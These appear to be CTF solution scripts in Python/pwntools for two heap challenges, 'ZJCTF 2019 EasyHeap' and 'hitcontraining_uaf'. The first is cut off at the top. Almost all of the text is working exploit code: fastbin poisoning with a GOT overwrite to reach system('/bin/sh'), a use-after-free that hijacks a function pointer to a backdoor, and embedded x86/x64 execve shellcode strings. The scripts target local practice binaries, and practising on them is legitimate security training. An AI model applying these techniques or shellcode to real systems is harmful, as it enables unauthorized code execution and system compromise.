[ZJCTF 2019]EasyHeap
debug_str = ""
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
for i in addr:
debug_str+='b *{}\n'.format(hex(text_base+i))
gdb.attach(p,debug_str)
else:
for i in addr:
debug_str+='b *{}\n'.format(hex(i))
gdb.attach(p,debug_str)
def dbg():
gdb.attach(p)
#-----------------------------------------------------------------------------------------
s = lambda data :p.send(str(data)) #in case that data is an int
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
it = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
bp = lambda bkp :pdbg.bp(bkp)
li = lambda str1,data1 :log.success(str1+'========>'+hex(data1))
def dbgc(addr):
gdb.attach(p,"b*" + hex(addr) +"\n c")
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
def choice(idx):
sa("choice :",str(idx))
def add(sz,context):
choice(1)
sa("Size of Heap : ",sz)
# sla("Index: ",idx)
#sla("size: ",sz)
sa("Content of heap:",context)
def edit(idx,sz,con):
choice(2)
sa("Index :",idx)
sa("Size of Heap : ",sz)
sa("Content of heap : ",con)
def delete(idx):
choice(3)
sa("Index :",idx)
def exp():
add(0x60,"a")#ck0
add(0x60,"b")#ck1
add(0x60,"c")#ck2,split
delete(1)#fastbin[0]->ck1->null
edit(0,0x78,'d'*0x68+p64(0x71)+p64(0x6020AD))
add(0x60,'e')#ck1
add(0x60,"f"*3+p64(9999))#ck3
p.sendline("4869")
time.sleep(1)
p.sendline(p64(1))
add(0x50,"a")#ck4
add(0x50,"b")#ck5
add(0x50,"c")#ck6,split
delete(5)#fastbin[0]->ck1->null
edit(4,0x68,'d'*0x58+p64(0x61)+p64(0x601ffa))
add(0x50,'/bin/sh\x00')#ck5
system_addr=0x400700
add(0x50,"f"*14+p64(system_addr))#ck3 ->got
delete(5)
if __name__ == '__main__':
#raw_input()
exp()
p.interactive()
hitcontraining_uaf
from pwn import *
import time
context.log_level = 'debug'
context.terminal=['tmux', 'splitw', '-h']
prog = './hacknote'
#elf = ELF(prog)#nc 121.36.194.21 49155
p = process(prog,env={"LD_PRELOAD":"./libc-2.23.so"})
libc = ELF("libc-2.23.so")
#p = remote("node4.buuoj.cn",28453)#nc 124.71.130.185 49155
def debug(addr,PIE=True):
debug_str = ""
if PIE:
text_base = int(os.popen("pmap {}| awk '{{print $1}}'".format(p.pid)).readlines()[1], 16)
for i in addr:
debug_str+='b *{}\n'.format(hex(text_base+i))
gdb.attach(p,debug_str)
else:
for i in addr:
debug_str+='b *{}\n'.format(hex(i))
gdb.attach(p,debug_str)
def dbg():
gdb.attach(p)
#-----------------------------------------------------------------------------------------
s = lambda data :p.send(str(data)) #in case that data is an int
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda numb=4096 :p.recv(numb)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
it = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4, '\0'))
uu64 = lambda data :u64(data.ljust(8, '\0'))
bp = lambda bkp :pdbg.bp(bkp)
li = lambda str1,data1 :log.success(str1+'========>'+hex(data1))
def dbgc(addr):
gdb.attach(p,"b*" + hex(addr) +"\n c")
def lg(s,addr):
print('\033[1;31;40m%20s-->0x%x\033[0m'%(s,addr))
sh_x86_18="\x6a\x0b\x58\x53\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x86_20="\x31\xc9\x6a\x0b\x58\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80"
sh_x64_21="\xf7\xe6\x50\x48\xbf\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x57\x48\x89\xe7\xb0\x3b\x0f\x05"
#https://www.exploit-db.com/shellcodes
#-----------------------------------------------------------------------------------------
def choice(idx):
sa("choice :",str(idx))
def add(sz,context):
choice(1)
sa("Note size :",sz)
# sla("Index: ",idx)
#sla("size: ",sz)
sa("Content :",context)
def delete(idx):
choice(2)
sa("Index :",idx)
def show(idx):
choice(3)
sa("Index :",idx)
def exp():
add(0x40,'aaaa')#H0 to give more fastbin[0],ck0,ck1
add(0x40,'bbbb')#H1 to give more fastbin[0],ck2,ck3
delete(0)
delete(1)
raw_input()
backdoor_addr=0x8048945
add(8,p32(backdoor_addr))
show(0)
if __name__ == '__main__':
#raw_input()
exp()
p.interactive()